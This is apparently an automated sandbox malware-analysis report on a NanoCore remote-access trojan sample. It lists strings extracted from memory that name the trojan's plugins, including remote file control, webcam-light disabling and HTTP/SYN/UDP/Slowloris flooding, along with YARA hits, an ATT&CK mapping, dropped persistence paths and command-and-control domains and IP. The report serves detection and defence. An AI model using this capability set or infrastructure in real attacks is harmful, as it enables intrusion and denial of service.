Source: ZVFVY7NwZ7.exe, 0000000D.00000002.484283906.0000000006400000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.481077983.0000000004080000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZVFVY7NwZ7.exe PID: 5612, type: MEMORY
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.408a169.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.6494629.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.6490000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.6490000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.3eff6b0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Registry Run Keys / Startup Folder11	Process Injection312	Disable or Modify Tools11	Input Capture11	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting111	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder11	Deobfuscate/Decode Files or Information1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	PowerShell1	Logon Script (Windows)	Logon Script (Windows)	Scripting111	Security Account Manager	System Information Discovery13	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information3	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing13	LSA Secrets	Security Software Discovery121	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol11	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Timestomp1	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Virtualization/Sandbox Evasion31	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion31	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection312	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ZVFVY7NwZ7.exe	100%	Avira	HEUR/AGEN.1129534
ZVFVY7NwZ7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	100%	Avira	HEUR/AGEN.1129534
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe	100%	Avira	HEUR/AGEN.1129534
C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.ZVFVY7NwZ7.exe.980000.0.unpack	100%	Avira	HEUR/AGEN.1129534	Download File
0.0.ZVFVY7NwZ7.exe.980000.0.unpack	100%	Avira	HEUR/AGEN.1129534	Download File
13.2.ZVFVY7NwZ7.exe.a40000.1.unpack	100%	Avira	HEUR/AGEN.1129534	Download File
13.0.ZVFVY7NwZ7.exe.a40000.0.unpack	100%	Avira	HEUR/AGEN.1129534	Download File
13.2.ZVFVY7NwZ7.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
13.0.ZVFVY7NwZ7.exe.400000.3.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
13.2.ZVFVY7NwZ7.exe.6490000.21.unpack	100%	Avira	TR/NanoCore.fadte	Download File
13.0.ZVFVY7NwZ7.exe.400000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
13.0.ZVFVY7NwZ7.exe.a40000.4.unpack	100%	Avira	HEUR/AGEN.1129534	Download File
13.0.ZVFVY7NwZ7.exe.a40000.2.unpack	100%	Avira	HEUR/AGEN.1129534	Download File

Domains

Source	Detection	Scanner	Label	Link
wekeepworking.sytes.net	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.microso	0%	URL Reputation	safe
http://schemas.microso	0%	URL Reputation	safe
http://schemas.microso	0%	URL Reputation	safe
http://schemas.microso	0%	URL Reputation	safe
wekeepworking.sytes.net	8%	Virustotal		Browse
wekeepworking.sytes.net	0%	Avira URL Cloud	safe
wekeepworking12.sytes.net	2%	Virustotal		Browse
wekeepworking12.sytes.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wekeepworking.sytes.net	79.134.225.90	true	true	8%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
wekeepworking.sytes.net	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
wekeepworking12.sytes.net	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.microso	ZVFVY7NwZ7.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ZVFVY7NwZ7.exe, 00000000.00000002.333622797.0000000002E61000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000003.399210115.0000000007577000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
79.134.225.90	wekeepworking.sytes.net	Switzerland		6775	FINK-TELECOM-SERVICESCH	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	431812
Start date:	09.06.2021
Start time:	11:09:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ZVFVY7NwZ7.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/15@9/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0% (good quality ratio 0%) Quality average: 0% Quality standard deviation: 0%
HCA Information:	Successful, ratio: 97% Number of executed functions: 98 Number of non-executed functions: 5
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 40.88.32.150, 13.64.90.137, 52.147.198.201, 13.88.21.125, 104.43.193.48, 20.82.209.183, 184.30.20.56, 67.26.137.254, 8.238.30.254, 67.26.81.254, 8.241.79.254, 8.241.89.126, 92.122.213.194, 92.122.213.247, 20.50.102.62, 92.122.145.220, 20.54.7.98, 20.82.210.154, 20.54.26.129 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:11:09	API Interceptor	524x Sleep call for process: ZVFVY7NwZ7.exe modified
11:11:32	API Interceptor	34x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
79.134.225.90	kyIfnzzg3E.exe	Get hash	malicious	Browse
	Ref 0180066743.xlsx	Get hash	malicious	Browse
	AedJpyQ9lM.exe	Get hash	malicious	Browse
	Purchase Order Price List.xlsx	Get hash	malicious	Browse
	qdFDmi3Bhy.exe	Get hash	malicious	Browse
	A2PlnLyOA7.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exe	Get hash	malicious	Browse
	LOT_20210526.xlsx	Get hash	malicious	Browse
	Q2MAUt4mRO.exe	Get hash	malicious	Browse
	4fn66P5vkl.exe	Get hash	malicious	Browse
	P_O 00041221.xlsx	Get hash	malicious	Browse
	LOT_20210526.xlsx	Get hash	malicious	Browse
	Swift Copy.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wekeepworking.sytes.net	kyIfnzzg3E.exe	Get hash	malicious	Browse	79.134.225.90
	Ref 0180066743.xlsx	Get hash	malicious	Browse	79.134.225.90
	AedJpyQ9lM.exe	Get hash	malicious	Browse	79.134.225.90
	Purchase Order Price List.xlsx	Get hash	malicious	Browse	79.134.225.90
	qdFDmi3Bhy.exe	Get hash	malicious	Browse	79.134.225.90
	A2PlnLyOA7.exe	Get hash	malicious	Browse	79.134.225.90
	SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exe	Get hash	malicious	Browse	79.134.225.90
	LOT_20210526.xlsx	Get hash	malicious	Browse	79.134.225.90
	Q2MAUt4mRO.exe	Get hash	malicious	Browse	79.134.225.90
	4fn66P5vkl.exe	Get hash	malicious	Browse	79.134.225.90
	P_O 00041221.xlsx	Get hash	malicious	Browse	79.134.225.90
	LOT_20210526.xlsx	Get hash	malicious	Browse	79.134.225.90
	QI5MR3pte0.exe	Get hash	malicious	Browse	185.140.53.40
	5Em2NXNxSt.exe	Get hash	malicious	Browse	185.140.53.40
	7Zpsd899Kf.exe	Get hash	malicious	Browse	185.140.53.40
	LfgEatrwIF.exe	Get hash	malicious	Browse	185.140.53.40

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
